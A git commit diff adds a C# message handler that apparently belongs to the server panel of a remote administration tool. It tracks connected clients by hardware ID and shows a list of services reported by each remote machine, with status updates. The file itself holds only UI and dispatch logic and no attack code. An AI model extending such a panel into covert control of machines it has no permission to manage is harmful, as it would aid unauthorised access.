initial commit
This commit is contained in:
@@ -0,0 +1,118 @@
|
||||
using System.Collections;
|
||||
using System.Windows.Forms;
|
||||
using Server.Connectings;
|
||||
using Server.Forms;
|
||||
|
||||
namespace Server.Messages;
|
||||
|
||||
internal class HandlerService
|
||||
{
|
||||
public static void Read(Clients client, object[] objects)
|
||||
{
|
||||
switch ((string)objects[1])
|
||||
{
|
||||
case "Connect":
|
||||
{
|
||||
FormService form3 = (FormService)Application.OpenForms["Service:" + (string)objects[2]];
|
||||
if (form3 == null)
|
||||
{
|
||||
client.Disconnect();
|
||||
break;
|
||||
}
|
||||
form3.Invoke((MethodInvoker)delegate
|
||||
{
|
||||
form3.Text = "Service [" + (string)objects[2] + "]";
|
||||
form3.client = client;
|
||||
form3.materialLabel1.Enabled = true;
|
||||
form3.dataGridView2.Enabled = true;
|
||||
form3.materialLabel1.Text = "Succues Connect";
|
||||
});
|
||||
client.Tag = form3;
|
||||
client.Hwid = (string)objects[2];
|
||||
break;
|
||||
}
|
||||
case "Error":
|
||||
{
|
||||
if (client.Tag == null)
|
||||
{
|
||||
client.Disconnect();
|
||||
break;
|
||||
}
|
||||
FormService form2 = (FormService)client.Tag;
|
||||
form2.Invoke((MethodInvoker)delegate
|
||||
{
|
||||
form2.materialLabel1.Text = "Error: " + (string)objects[2];
|
||||
});
|
||||
break;
|
||||
}
|
||||
case "Status":
|
||||
{
|
||||
if (client.Tag == null)
|
||||
{
|
||||
client.Disconnect();
|
||||
break;
|
||||
}
|
||||
FormService form4 = (FormService)client.Tag;
|
||||
form4.Invoke((MethodInvoker)delegate
|
||||
{
|
||||
form4.materialLabel1.Text = "Succues status";
|
||||
foreach (DataGridViewRow item in (IEnumerable)form4.dataGridView2.Rows)
|
||||
{
|
||||
if (item.Cells[1].Value as string == (string)objects[2])
|
||||
{
|
||||
item.Cells[1].Value = (string)objects[3];
|
||||
break;
|
||||
}
|
||||
}
|
||||
});
|
||||
break;
|
||||
}
|
||||
case "List":
|
||||
{
|
||||
if (client.Tag == null)
|
||||
{
|
||||
client.Disconnect();
|
||||
break;
|
||||
}
|
||||
FormService form = (FormService)client.Tag;
|
||||
form.Invoke((MethodInvoker)delegate
|
||||
{
|
||||
form.dataGridView2.Rows.Clear();
|
||||
form.materialLabel1.Text = "Succues list";
|
||||
int num = 2;
|
||||
while (num < objects.Length)
|
||||
{
|
||||
DataGridViewRow dataGridViewRow = new DataGridViewRow
|
||||
{
|
||||
Cells =
|
||||
{
|
||||
(DataGridViewCell)new DataGridViewTextBoxCell
|
||||
{
|
||||
Value = (string)objects[num++]
|
||||
},
|
||||
(DataGridViewCell)new DataGridViewTextBoxCell
|
||||
{
|
||||
Value = (string)objects[num++]
|
||||
},
|
||||
(DataGridViewCell)new DataGridViewTextBoxCell
|
||||
{
|
||||
Value = (string)objects[num++]
|
||||
},
|
||||
(DataGridViewCell)new DataGridViewTextBoxCell
|
||||
{
|
||||
Value = (string)objects[num++]
|
||||
},
|
||||
(DataGridViewCell)new DataGridViewTextBoxCell
|
||||
{
|
||||
Value = (string)objects[num++]
|
||||
}
|
||||
}
|
||||
};
|
||||
form.dataGridView2.Rows.Add(dataGridViewRow);
|
||||
}
|
||||
});
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user